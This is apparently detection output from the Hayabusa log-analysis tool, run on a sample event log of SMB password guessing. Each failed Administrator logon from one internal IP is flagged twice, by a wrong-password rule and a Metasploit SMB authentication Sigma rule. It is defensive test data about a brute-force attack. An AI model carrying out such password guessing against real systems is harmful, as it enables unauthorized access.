+2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W91ruUEdXwRcMxVB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6PEs7fp97cYFf4vx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hQelUX0kwLfpJnr0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t88CBspQqbiO1IPc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zELW2Upo3jRCIqJk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QfcyJGLYmu93JBIL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3t2nKPZHZvcXM3QA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oiDRonqdEM2YJvz9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wJPF4GUypkDkTz56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cd5YRVIoXx8LoYpK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H49I2Xp2Gz1Jj0Wh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZMSWWzskoRfYBGny  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GLm2PolKMBsYkPnN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2ZjHWhG2rXzYWskz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FOZzVedHYODB5Yvd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xVaRybjI4HdZV0Zs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tTcl30MvvycjFcQb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fVZqbCr9EwmV4gNE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zVwhii0TVmCkpDI0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Tx04CPPVa6WYY9G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gHyefIGqhIIy3ZI9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wrietoh4wgXcEvNd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9WW0Y5PW2JfCCdyR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tmXsMJ0ELK4qiNY6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yeftUqriSoxCgmDy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 60JE9WQQ8N00j65B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r0rt2yVAEH6V4IIS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pay98C2Gr1di7qQd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8TyPDYm9QCAmqj7h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Dw3iK7DQMVXy8LW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BMuO0QEkxpKRv4Vl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RaHECaQDXCXQc9Xw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ewXT2VcARiaNLIxJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dGSTrm4AOojs7So0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wVTBSk0Q65LkaTqg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NjFN51w3T4VwuWa5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KG7a88h48ZEyOuYw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6ksKuTSGukc5em3B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tPEMcGV6ZR92sWNY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iBQ6sKrRjb7BsySN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gDFnG1gv7jOeIQ0t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QdFKkcNpkfAScnkp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IAYbV4ioewwkZSmy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1bQ2Dxd6nlgSXJpo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: havLyoVCfdCqzrqO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b2vZLhz19pXrq9iE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
